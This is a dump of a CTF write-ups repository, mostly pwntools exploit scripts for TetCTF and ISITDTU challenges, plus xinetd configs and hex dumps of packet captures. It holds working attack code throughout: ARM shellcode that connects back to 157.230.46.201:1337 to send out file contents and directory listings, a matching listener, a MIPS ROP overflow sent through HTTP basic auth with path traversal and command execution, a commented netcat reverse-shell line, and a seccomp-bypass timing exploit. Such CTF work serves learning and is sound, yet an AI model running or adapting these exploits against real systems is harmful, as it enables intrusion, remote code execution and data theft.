52 | payload += asm(pwnlib.shellcraft.arm.linux.connect("157.230.46.201", 1337)) 53 | payload += asm(pwnlib.shellcraft.arm.linux.cat(filename,"r6")) 54 | return payload 55 | 56 | def shellcode_readdir(): 57 | dirname = "/etc/xinetd.d" 58 | payload = "\x00\x00\x00\x00\x50\x90\x50\x90\x50\x90\x50\x90" 59 | payload += "\x00"*0x20 60 | payload += asm(pwnlib.shellcraft.arm.linux.connect("157.230.46.201", 1337)) 61 | payload += asm("mov r10, r6") 62 | # O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC = 0x84800 63 | payload += asm(pwnlib.shellcraft.open(dirname,0x84800,0x11f3bf00)) 64 | payload += asm("sub r9, sp, #12288") 65 | payload += asm(shellcraft.arm.linux.syscall('SYS_getdents', "r0", "r9", 0x2000, 0)) 66 | payload += asm(shellcraft.write("r10", 'r9', 0x2000)) 67 | payload += 
asm(pwnlib.shellcraft.arm.linux.echo("---","r10")) 68 | return payload 69 | 70 | r.recvuntil("Your secret: ") 71 | 72 | # payload = shellcode_readFile() 73 | # payload = shellcode_getFlag() # fmt 74 | payload = shellcode_readdir() # readdir 75 | r.sendline(payload) 76 | r.recvuntil("Small leak: ") 77 | leak = int(r.recvuntil("\n").strip(),16) >> 16 78 | payload = calc(leak) + "\x7d\x46\x28\x47\x22\x26\xe0\xe1\x02\x26\xe0\xe1\x01\x20\x82\xe2\x01\x50\x8f\xe2\x15\xff\x2f\xe1\x04\x32\x10\x1c\x08\x4b\x00\x21\x21\x27\x01\xdf\x76\x40\x0e\x3e\xb0\x42\xe9\xd0\x14\x68\x9c\x42\xf2\xd1\x15\x1d\x2c\x68\x9c\x42\xee\xd1\x05\x35\x28\x47\x00\x00\x50\x90\x50\x90" 79 | r.sendline(payload) 80 | r.interactive() 81 | 82 | babyshellcode(sys.argv[1]) -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/solution/server_backconnect.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | context.arch = "thumb" 6 | def fmt(): 7 | r = listen(1337) 8 | payload = "%52$p---" 9 | r.sendline(payload) 10 | flagaddr = int(r.recvuntil("---")[:-3],16) + 0x78 11 | # print hex(flagaddr) 12 | payload = "%7$s" 13 | payload = payload.ljust(8,"X") 14 | payload += p32(flagaddr) 15 | r.sendline(payload) 16 | 17 | r.interactive() 18 | 19 | def readdir(): 20 | dtypes = {} 21 | dtypes["\x04"] = "DT_DIR" 22 | dtypes["\x0a"] = "DT_LNK" 23 | dtypes["\x08"] = "DT_REG" 24 | 25 | r = listen(1337) 26 | data = r.recvuntil("---") 27 | bpos = 0 28 | while 1: 29 | ino = u32(data[bpos:bpos+4]) 30 | off_t = u32(data[bpos+4:bpos+8]) 31 | idx = data.find("\x00",bpos+10) 32 | if bpos+10==idx: 33 | break 34 | d_reclen = u16(data[bpos+8:bpos+10]) 35 | d_type = data[bpos+d_reclen-1] 36 | log.info("%s\t%s" % (data[bpos+10:idx],dtypes[d_type])) 37 | bpos += d_reclen 38 | 39 | readdir() 40 | fmt() -------------------------------------------------------------------------------- 
/2020/tetctf/babyarmshellcode/xinetd.d/babyfmt_xinetd: -------------------------------------------------------------------------------- 1 | service babyfmt 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/babyfmt/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = babyfmt 10 | only_from = 127.0.0.1 11 | port = 8888 12 | flags = REUSE 13 | per_source = 5 14 | rlimit_cpu = 3 15 | nice = 18 16 | } 17 | -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/xinetd.d/babyshellcode_xinetd: -------------------------------------------------------------------------------- 1 | service babyshellcode 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/babyshellcode/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = babyshellcode 10 | host = 0.0.0.0 11 | port = 9999 12 | flags = REUSE 13 | per_source = 5 14 | rlimit_cpu = 3 15 | nice = 18 16 | } 17 | -------------------------------------------------------------------------------- /2021/ISITDTU_final/solve.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import sys 3 | import requests 4 | import base64 5 | from pwn import * 6 | import string 7 | import random 8 | 9 | 10 | def readfile(filename, url, username = "a", password = "S"): 11 | t = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(3)) 12 | request_url = "%s/cgi-bin/ping.cgi?ip=127.0.0.1&c=10&t=%s.html" % (url, t) 13 | request_headers = {"Authorization": "Basic %s" % base64.b64encode(username+":"+password)} 14 | try: 15 | requests.get(request_url, headers=request_headers, timeout=1) 16 | except requests.exceptions.ReadTimeout: 17 | pass 18 | 19 | request_url = "%s/cgi-bin/main.cgi?page=../../../../tmp/%s.html/../../%s" % (url, t, filename) 20 | r = requests.get(request_url, headers=request_headers) 21 | return r.text.strip() 22 | 23 | def getLibBase(url): 24 | 
maps = readfile("proc/self/maps", url) 25 | if "File Not Found" in maps: 26 | return False 27 | for m in maps.splitlines(): 28 | if "r-xp" in m and "libc.so.0" in m: 29 | return int(m.split("-")[0],16) 30 | break 31 | 32 | def flag1(url): 33 | request_url = "%s/cgi-bin/main.cgi?page=flag.html" % url 34 | for u in string.letters: 35 | for p in string.letters: 36 | request_headers = {"Authorization": "Basic %s" % base64.b64encode(u+":"+p)} 37 | r = requests.get(request_url, headers=request_headers) 38 | if r.status_code != 401: 39 | print("[+] Login Success with username=%s, password=%s" % (u, p)) 40 | print("[+] Flag: %s" % r.text.strip()) 41 | return 42 | 43 | def flag2(url, username, password): 44 | print("[+] Flag: %s" % readfile("flag", url, username, password)) 45 | 46 | def runCommand(command, url): 47 | context.arch = "mips" 48 | context.endian = "big" 49 | base = getLibBase(url) 50 | print("[+] Base Libc: %s" % hex(base)) 51 | if base == False: 52 | print("[-] Error to get libc base! 
Try again please!") 53 | return 54 | gadget1 = base + 0x00041a4c # addiu $a0, $sp, 0x18 ; lw $gp, 0x10($sp) ; lw $ra, 0x30($sp) ; nop ; jr $ra ; addiu $sp, $sp, 0x38 55 | gadget2 = base + 0x00041a40 # move $t9, $a0 ; sw $v0, 0x18($sp) ; jalr $t9 ; addiu $a0, $sp, 0x18 56 | 57 | shell = "" 58 | shell += pwnlib.shellcraft.mips.pushstr_array("$a1",["/bin/sh","-c", command]) 59 | shell += "lw $a0, 0($a1)\n" # a0 => /bin/sh (pathname) 60 | shell += "slti $a2, $zero, 0xFFFF\n" # a2 = null (env) 61 | shell += "ori $v0, $zero, SYS_execve\n" # SYS_execve 62 | shell += "syscall 0x40404\n" 63 | 64 | username = "admin" 65 | password = "A"*(0x80+0x14) 66 | password += p32(gadget1) 67 | password += "B"*0x1c 68 | password += asm("addiu $sp, $sp, 0x0104 ; jalr $sp ; move $a1, $s4") 69 | password += "C"*0x0c 70 | password += p32(gadget2) 71 | password += "D"*0x108 72 | password += pwnlib.encoders.encoder.null(asm(shell)) 73 | 74 | request_url = "%s/cgi-bin/main.cgi" % url 75 | request_headers = {"Authorization": "Basic %s" % base64.b64encode(username+":"+password)} 76 | requests.get(request_url, headers=request_headers) 77 | 78 | def flag3(url, username, password): 79 | # runCommand("nc 127.0.0.1 4646 -e /bin/bash") 80 | runCommand("/readflag > /tmp/quynhnhu5tuoi", url) 81 | print("[+] Flag: %s" % readfile("tmp/quynhnhu5tuoi", url, username, password)) 82 | runCommand("rm /tmp/quynhnhu5tuoi", url) 83 | 84 | 85 | 86 | def main(): 87 | print("[*] Author: phieulang1993") 88 | parser = argparse.ArgumentParser() 89 | parser.add_argument('--url', help='target\'s url') 90 | parser.add_argument('--flag', '-f', help='flag 1, 2 or 3') 91 | parser.add_argument('--username', '-u', help='username for flag 2 or 3') 92 | parser.add_argument('--password', '-p', help='password for flag 2 or 3') 93 | 94 | args = parser.parse_args() 95 | if args.url == None and args.flag == None: 96 | parser.print_help() 97 | sys.exit() 98 | 99 | url = args.url 100 | if url[-1] == "/": 101 | url = url[:-1] 102 | if 
"http://" not in url: 103 | url = "http://{0}".format(url) 104 | 105 | f = int(args.flag) 106 | if f == 1: 107 | flag1(url) 108 | elif f == 2: 109 | flag2(url, args.username, args.password) 110 | elif f == 3: 111 | flag3(url, args.username, args.password) 112 | else: 113 | parser.print_help() 114 | sys.exit() 115 | 116 | if __name__ == '__main__': 117 | main() 118 | 119 | # python solve.py --url="34.126.182.54" --flag=3 --username=a --password=S 120 | # python solve.py --url="34.125.0.41" --flag=1 --username=a --password=S -------------------------------------------------------------------------------- /2022/ISITDTU CTF 2022 FINALS/whitelist_sc/whitelist_sc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2022/ISITDTU CTF 2022 FINALS/whitelist_sc/whitelist_sc -------------------------------------------------------------------------------- /2022/ISITDTU CTF 2022 FINALS/whitelist_sc/whitelist_sc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from pwn import * 3 | from time import time 4 | context.arch = "amd64" 5 | r = None 6 | 7 | if len(sys.argv) < 3: 8 | print("Usage: python %s IP PORT" % sys.argv[0]) 9 | exit(1) 10 | 11 | 12 | def challenge(ip, port): 13 | DEBUG = 0 14 | 15 | if DEBUG: 16 | r = remote(ip, port) 17 | read_main = 0xC0DE044 18 | leave = 0xC0DE062 19 | rsp = 0xC0DE700 20 | shellcode_x86_addr = 0xC0DE100 21 | shellcode_x64_addr = 0xC0DE200 22 | flag_path_addr = 0xC0DE300 23 | flag_content_addr = 0xC0DE800 24 | 25 | r.recvline() # Whitelist: socket, preadv, exit_group, exit, read, sendmsg, setsockopt, exit_group, exit, lstat, getegid, capget, lgetxattr, chmod, getcwd, chdir 26 | r.recvline() # Read flag at /flag! 
27 | payload = fit(leave, chr(read_main & 0xff)) 28 | shellcode_read_more = """ 29 | mov dx, 0x500 30 | mov al, 0 31 | syscall 32 | """ 33 | shellcode_read_more = asm(shellcode_read_more, arch='amd64', bits=64) 34 | shellcode_read_more = shellcode_read_more.ljust(0x9, "\x90") 35 | payload += shellcode_read_more 36 | 37 | shellcode_switch_x86 = """ 38 | mov rsp, %d 39 | mov DWORD PTR [rsp], %d 40 | mov DWORD PTR [rsp+4], 0x23 41 | retf 42 | """ % (rsp, shellcode_x86_addr) 43 | 44 | shellcode_switch_x86 = "\x90" * \ 45 | (0xc0de06a-0xc0de062) + asm(shellcode_switch_x86, arch='amd64', bits=64) 46 | shellcode_switch_x86 = shellcode_switch_x86.ljust( 47 | 0xc0de100-0xc0de062, "\x90") 48 | 49 | shellcode_x86 = """ 50 | mov eax, 295 51 | mov ebx, 0xffffffff 52 | mov ecx, %d 53 | mov edx, 0 54 | int 0x80 55 | mov esp, %d 56 | mov DWORD PTR [esp], %d 57 | mov DWORD PTR [esp+4], 0x33 58 | retf 59 | """ % (flag_path_addr, rsp, shellcode_x64_addr) 60 | shellcode_x86 = asm(shellcode_x86, arch='i386', bits=32).ljust( 61 | 0xc0de200-0xc0de100, "\x90") 62 | 63 | idx = 0 64 | bit_check = 1 65 | 66 | shellcode_x64 = """ 67 | mov rax, 0 68 | mov rdi, 3 69 | mov rsi, %d 70 | mov rdx, 0x1000 71 | syscall 72 | mov rcx, %d 73 | mov rax, %d 74 | mov bl, BYTE PTR [rax+rcx] 75 | shr bl, %d 76 | and bl, 0x1 77 | cmp bl, 0 78 | jne exit 79 | loop: 80 | jmp $ 81 | exit: 82 | mov rax, 60 83 | syscall 84 | """ % (flag_content_addr, idx, flag_content_addr, bit_check) 85 | 86 | shellcode_x64 = asm(shellcode_x64, arch='amd64', bits=64).ljust( 87 | 0xc0de300-0xc0de200, "\x90") 88 | 89 | payload += shellcode_switch_x86 90 | payload += shellcode_x86 91 | payload += shellcode_x64 92 | payload += "/etc/passwd\x00" 93 | r.send(payload) 94 | s = time() 95 | r.recvall(timeout=0.5) 96 | log.info("time: %f" % (time()-s)) 97 | r.interactive() 98 | else: 99 | idx = 0 100 | flag = "" 101 | context.log_level = 'critical' 102 | 103 | while 1: 104 | flag_char = 0 105 | for bit_check in range(7): 106 | r = 
remote(ip, port) 107 | r.recvuntil("Read flag at /flag\n") 108 | payload = "\x62\xe0\x0d\x0c\x00\x00\x00\x00\x44\x66\xba\x00\x05\xb0\x00\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\xc7\xc4\x00\xe7\x0d\x0c\xc7\x04\x24\x00\xe1\x0d\x0c\xc7\x44\x24\x04\x23\x00\x00\x00\xcb\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x27\x01\x00\x00\xbb\xff\xff\xff\xff\xb9\x00\xe3\x0d\x0c\xba\x00\x00\x00\x00\xcd\x80\xbc\x00\xe7\x0d\x0c\xc7\x04\x24\x00\xe2\x0d\x0c\xc7\x44\x24\x04\x33\x00\x00\x00\xcb\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\xc7\xc0\x00\x00\x00\x00\x48\xc7\xc7\x03\x00\x00\x00\x48\xc7\xc6\x00\xe8\x0d\x0c\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\xc7\xc1" + \ 109 | chr(idx) + 
"\x00\x00\x00\x48\xc7\xc0\x00\xe8\x0d\x0c\x8a\x1c\x08\xc0\xeb" + chr(bit_check) + "\x80\xe3\x01\x80\xfb\x00\x75\x02\xeb\xfe\x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"+"/flag\x00" 110 | r.send(payload) 111 | s = time() 112 | to = 0.5 113 | r.recvall(timeout=to) 114 | if time()-s < to: 115 | flag_char += 2**bit_check 116 | if flag_char == 0: 117 | exit() 118 | idx += 1 119 | flag += chr(flag_char) 120 | print(flag) 121 | 122 | 123 | challenge(sys.argv[1], int(sys.argv[2])) 124 | -------------------------------------------------------------------------------- /2022/TetCTF 2023/pwn01/1MB: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2022/TetCTF 2023/pwn01/1MB -------------------------------------------------------------------------------- /2022/TetCTF 2023/pwn01/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2022/TetCTF 2023/pwn01/chall -------------------------------------------------------------------------------- /2022/TetCTF 2023/pwn01/libc.so.6: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2022/TetCTF 2023/pwn01/libc.so.6 -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/packets_cleartext.pcap: -------------------------------------------------------------------------------- 1 | 00000000 46 69 6e 64 20 66 6c 61 67 Find fla g 2 | 00000009 0a . 3 | 00000000 68 08 41 40 00 41 5a 6a 29 58 6a 02 5f 6a 01 5e h.A@.AZj )Xj._j.^ 4 | 00000010 99 0f 05 48 89 c5 48 b8 01 01 01 01 01 01 01 01 ...H..H. ........ 5 | 00000020 50 48 b8 03 01 0d eb 0b 0b 0b 02 48 31 04 24 6a PH...... ...H1.$j 6 | 00000030 2a 58 48 89 ef 6a 10 5a 48 89 e6 0f 05 31 c0 48 *XH..j.Z H....1.H 7 | 00000040 89 ef 31 d2 b6 05 4c 89 d6 0f 05 6a 01 5f 48 89 ..1...L. ...j._H. 8 | 00000050 c2 4c 89 d6 6a 01 58 0f 05 31 c0 31 ff 31 d2 b6 .L..j.X. .1.1.1.. 9 | 00000060 05 4c 89 d6 0f 05 48 89 ef 48 89 c2 4c 89 d6 6a .L....H. .H..L..j 10 | 00000070 01 58 0f 05 31 c0 48 89 ef 31 d2 b6 05 4c 89 d6 .X..1.H. .1...L.. 11 | 00000080 0f 05 6a 01 5f 48 89 c2 4c 89 d6 6a 01 58 0f 05 ..j._H.. L..j.X.. 12 | 00000090 41 80 7a 05 03 74 1b 31 c0 31 ff 31 d2 b6 05 4c A.z..t.1 .1.1...L 13 | 000000A0 89 d6 0f 05 48 89 ef 48 89 c2 4c 89 d6 6a 01 58 ....H..H ..L..j.X 14 | 000000B0 0f 05 31 c0 48 89 ef 31 d2 b6 05 4c 89 d6 0f 05 ..1.H..1 ...L.... 15 | 000000C0 6a 01 5f 48 89 c2 4c 89 d6 6a 01 58 0f 05 eb c7 j._H..L. .j.X.... 16 | 0000000A 49 00 00 00 0a 38 2e 31 2e 30 00 c0 00 00 00 1a I....8.1 .0...... 17 | 0000001A 44 52 75 6e 21 19 7a 00 ff ff ff 02 00 ff df 15 DRun!.z. ........ 18 | 0000002A 00 00 00 00 00 00 00 00 00 00 36 4b 1c 3f 60 04 ........ ..6K.?`. 19 | 0000003A 37 40 01 57 40 57 00 63 61 63 68 69 6e 67 5f 73 7@.W@W.c aching_s 20 | 0000004A 68 61 32 5f 70 61 73 73 77 6f 72 64 00 ha2_pass word. 21 | 000000D0 e5 00 00 01 8d a2 bf 00 00 00 00 01 21 00 00 00 ........ 
....!... 22 | 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 23 | 000000F0 00 00 00 00 69 73 69 74 64 74 75 00 20 b1 dd 5b ....isit dtu. ..[ 24 | 00000100 0e 3f 07 05 a4 cf e0 66 2c bf 4c 34 fe 6e df b0 .?.....f ,.L4.n.. 25 | 00000110 f6 77 7d 8b 89 bc 27 cd 8b c7 f2 fd 51 66 6c 34 .w}...'. ....Qfl4 26 | 00000120 67 00 63 61 63 68 69 6e 67 5f 73 68 61 32 5f 70 g.cachin g_sha2_p 27 | 00000130 61 73 73 77 6f 72 64 00 80 03 5f 6f 73 05 4c 69 assword. .._os.Li 28 | 00000140 6e 75 78 0c 5f 63 6c 69 65 6e 74 5f 6e 61 6d 65 nux._cli ent_name 29 | 00000150 0a 6c 69 62 6d 61 72 69 61 64 62 04 5f 70 69 64 .libmari adb._pid 30 | 00000160 07 33 33 35 31 39 37 37 0f 5f 63 6c 69 65 6e 74 .3351977 ._client 31 | 00000170 5f 76 65 72 73 69 6f 6e 05 33 2e 33 2e 35 09 5f _version .3.3.5._ 32 | 00000180 70 6c 61 74 66 6f 72 6d 06 78 38 36 5f 36 34 0c platform .x86_64. 33 | 00000190 70 72 6f 67 72 61 6d 5f 6e 61 6d 65 05 6d 79 73 program_ name.mys 34 | 000001A0 71 6c 0c 5f 73 65 72 76 65 72 5f 68 6f 73 74 09 ql._serv er_host. 35 | 000001B0 6c 6f 63 61 6c 68 6f 73 74 localhos t 36 | 00000057 02 00 00 02 01 03 ...... 37 | 0000005D 10 00 00 03 00 00 00 02 40 00 00 00 07 01 05 04 ........ @....... 38 | 0000006D 66 6c 34 67 fl4g 39 | 000001B9 13 00 00 00 03 73 65 6c 65 63 74 20 2a 20 66 72 .....sel ect * fr 40 | 000001C9 6f 6d 20 66 6c 34 67 om fl4g 41 | 00000071 01 00 00 01 01 2a 00 00 02 03 64 65 66 04 66 6c .....*.. ..def.fl 42 | 00000081 34 67 04 66 6c 34 67 04 66 6c 34 67 04 66 6c 61 4g.fl4g. fl4g.fla 43 | 00000091 67 04 66 6c 61 67 0c 21 00 fd 02 00 00 fd 00 00 g.flag.! ........ 44 | 000000A1 00 00 00 05 00 00 03 fe 00 00 22 00 25 00 00 04 ........ ..".%... 45 | 000000B1 24 49 53 49 54 44 54 55 7b 70 69 76 30 74 5f 69 $ISITDTU {piv0t_i 46 | 000000C1 35 5f 6e 30 54 5f 76 33 72 79 5f 64 69 46 66 69 5_n0T_v3 ry_diFfi 47 | 000000D1 63 55 6c 54 7d 05 00 00 05 fe 00 00 22 00 cUlT}... ....". 48 | 000001D0 01 00 00 00 01 ..... 
49 | -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/packets_pubkey.pcap: -------------------------------------------------------------------------------- 1 | 00000000 46 69 6e 64 20 66 6c 61 67 Find fla g 2 | 00000009 0a . 3 | 00000000 68 08 41 40 00 41 5a 6a 29 58 6a 02 5f 6a 01 5e h.A@.AZj )Xj._j.^ 4 | 00000010 99 0f 05 48 89 c5 48 b8 01 01 01 01 01 01 01 01 ...H..H. ........ 5 | 00000020 50 48 b8 03 01 0d eb 0b 0b 0b 02 48 31 04 24 6a PH...... ...H1.$j 6 | 00000030 2a 58 48 89 ef 6a 10 5a 48 89 e6 0f 05 31 c0 48 *XH..j.Z H....1.H 7 | 00000040 89 ef 31 d2 b6 05 4c 89 d6 0f 05 6a 01 5f 48 89 ..1...L. ...j._H. 8 | 00000050 c2 4c 89 d6 6a 01 58 0f 05 31 c0 31 ff 31 d2 b6 .L..j.X. .1.1.1.. 9 | 00000060 05 4c 89 d6 0f 05 48 89 ef 48 89 c2 4c 89 d6 6a .L....H. .H..L..j 10 | 00000070 01 58 0f 05 31 c0 48 89 ef 31 d2 b6 05 4c 89 d6 .X..1.H. .1...L.. 11 | 00000080 0f 05 6a 01 5f 48 89 c2 4c 89 d6 6a 01 58 0f 05 ..j._H.. L..j.X.. 12 | 00000090 41 80 7a 05 03 74 1b 31 c0 31 ff 31 d2 b6 05 4c A.z..t.1 .1.1...L 13 | 000000A0 89 d6 0f 05 48 89 ef 48 89 c2 4c 89 d6 6a 01 58 ....H..H ..L..j.X 14 | 000000B0 0f 05 31 c0 48 89 ef 31 d2 b6 05 4c 89 d6 0f 05 ..1.H..1 ...L.... 15 | 000000C0 6a 01 5f 48 89 c2 4c 89 d6 6a 01 58 0f 05 eb c7 j._H..L. .j.X.... 16 | 0000000A 49 00 00 00 0a 38 2e 31 2e 30 00 08 00 00 00 26 I....8.1 .0.....& 17 | 0000001A 1e 6f 61 05 34 77 72 00 ff ff ff 02 00 ff df 15 .oa.4wr. ........ 18 | 0000002A 00 00 00 00 00 00 00 00 00 00 77 2e 2e 1d 07 61 ........ ..w....a 19 | 0000003A 19 5d 28 29 29 48 00 63 61 63 68 69 6e 67 5f 73 .]())H.c aching_s 20 | 0000004A 68 61 32 5f 70 61 73 73 77 6f 72 64 00 ha2_pass word. 21 | 000000D0 e5 00 00 01 8d a2 bf 00 00 00 00 01 21 00 00 00 ........ ....!... 22 | 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 23 | 000000F0 00 00 00 00 69 73 69 74 64 74 75 00 20 4f 98 b2 ....isit dtu. O.. 
24 | 00000100 74 f9 d2 85 f6 90 69 0b 7a cb 1a c5 a8 ba 58 3d t.....i. z.....X= 25 | 00000110 b9 bb 84 26 a1 9d 0c 11 4f 57 75 4e 4e 66 6c 34 ...&.... OWuNNfl4 26 | 00000120 67 00 63 61 63 68 69 6e 67 5f 73 68 61 32 5f 70 g.cachin g_sha2_p 27 | 00000130 61 73 73 77 6f 72 64 00 80 03 5f 6f 73 05 4c 69 assword. .._os.Li 28 | 00000140 6e 75 78 0c 5f 63 6c 69 65 6e 74 5f 6e 61 6d 65 nux._cli ent_name 29 | 00000150 0a 6c 69 62 6d 61 72 69 61 64 62 04 5f 70 69 64 .libmari adb._pid 30 | 00000160 07 33 33 35 34 34 30 36 0f 5f 63 6c 69 65 6e 74 .3354406 ._client 31 | 00000170 5f 76 65 72 73 69 6f 6e 05 33 2e 33 2e 35 09 5f _version .3.3.5._ 32 | 00000180 70 6c 61 74 66 6f 72 6d 06 78 38 36 5f 36 34 0c platform .x86_64. 33 | 00000190 70 72 6f 67 72 61 6d 5f 6e 61 6d 65 05 6d 79 73 program_ name.mys 34 | 000001A0 71 6c 0c 5f 73 65 72 76 65 72 5f 68 6f 73 74 09 ql._serv er_host. 35 | 000001B0 6c 6f 63 61 6c 68 6f 73 74 localhos t 36 | 00000057 02 00 00 02 01 04 ...... 37 | 000001B9 01 00 00 03 02 ..... 38 | 0000005D c4 01 00 04 01 2d 2d 2d 2d 2d 42 45 47 49 4e 20 .....--- --BEGIN 39 | 0000006D 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a PUBLIC K EY-----. 
40 | 0000007D 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 MIIBIjAN BgkqhkiG 41 | 0000008D 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 9w0BAQEF AAOCAQ8A 42 | 0000009D 4d 49 49 42 43 67 4b 43 41 51 45 41 79 75 4f 53 MIIBCgKC AQEAyuOS 43 | 000000AD 31 78 31 32 55 66 2f 30 4d 76 34 37 69 74 79 35 1x12Uf/0 Mv47ity5 44 | 000000BD 0a 70 55 32 57 71 53 73 51 41 73 54 65 6f 32 50 .pU2WqSs QAsTeo2P 45 | 000000CD 6f 4a 74 38 44 35 52 66 64 37 52 79 37 6f 68 72 oJt8D5Rf d7Ry7ohr 46 | 000000DD 51 46 53 52 49 33 41 45 50 34 72 63 50 62 6e 58 QFSRI3AE P4rcPbnX 47 | 000000ED 44 65 74 72 76 56 5a 59 52 34 4d 4c 79 56 74 46 DetrvVZY R4MLyVtF 48 | 000000FD 4a 0a 47 78 62 4c 30 61 6f 49 42 45 75 75 76 30 J.GxbL0a oIBEuuv0 49 | 0000010D 4d 77 69 33 6b 48 57 54 65 2b 34 59 64 53 6c 64 Mwi3kHWT e+4YdSld 50 | 0000011D 73 4b 73 6e 41 4f 5a 77 44 62 33 43 35 44 30 47 sKsnAOZw Db3C5D0G 51 | 0000012D 75 63 4a 6a 6f 4d 38 64 76 6d 42 56 6b 39 31 36 ucJjoM8d vmBVk916 52 | 0000013D 6a 4a 0a 54 37 30 43 65 34 66 62 4e 53 51 57 48 jJ.T70Ce 4fbNSQWH 53 | 0000014D 34 54 34 54 34 4b 42 38 37 38 30 72 4c 58 68 42 4T4T4KB8 780rLXhB 54 | 0000015D 79 47 6b 63 61 56 4c 47 74 75 32 37 46 71 69 36 yGkcaVLG tu27Fqi6 55 | 0000016D 6e 36 50 34 4d 4f 63 31 67 62 7a 72 59 63 6b 62 n6P4MOc1 gbzrYckb 56 | 0000017D 4f 43 75 0a 74 63 74 65 6a 4f 63 76 41 52 6d 33 OCu.tcte jOcvARm3 57 | 0000018D 71 4f 49 63 68 4c 39 71 43 65 37 74 56 56 45 2f qOIchL9q Ce7tVVE/ 58 | 0000019D 76 49 58 4c 59 6c 46 62 53 51 35 65 57 2f 6a 52 vIXLYlFb SQ5eW/jR 59 | 000001AD 32 37 70 44 63 53 50 52 74 79 66 47 6b 78 57 47 27pDcSPR tyfGkxWG 60 | 000001BD 6b 46 70 4a 0a 52 58 56 49 6a 4d 55 4f 71 61 50 kFpJ.RXV IjMUOqaP 61 | 000001CD 78 32 58 49 7a 2f 55 6f 43 45 2f 42 47 50 69 77 x2XIz/Uo CE/BGPiw 62 | 000001DD 71 56 77 53 57 6c 46 79 6e 65 35 42 47 75 77 46 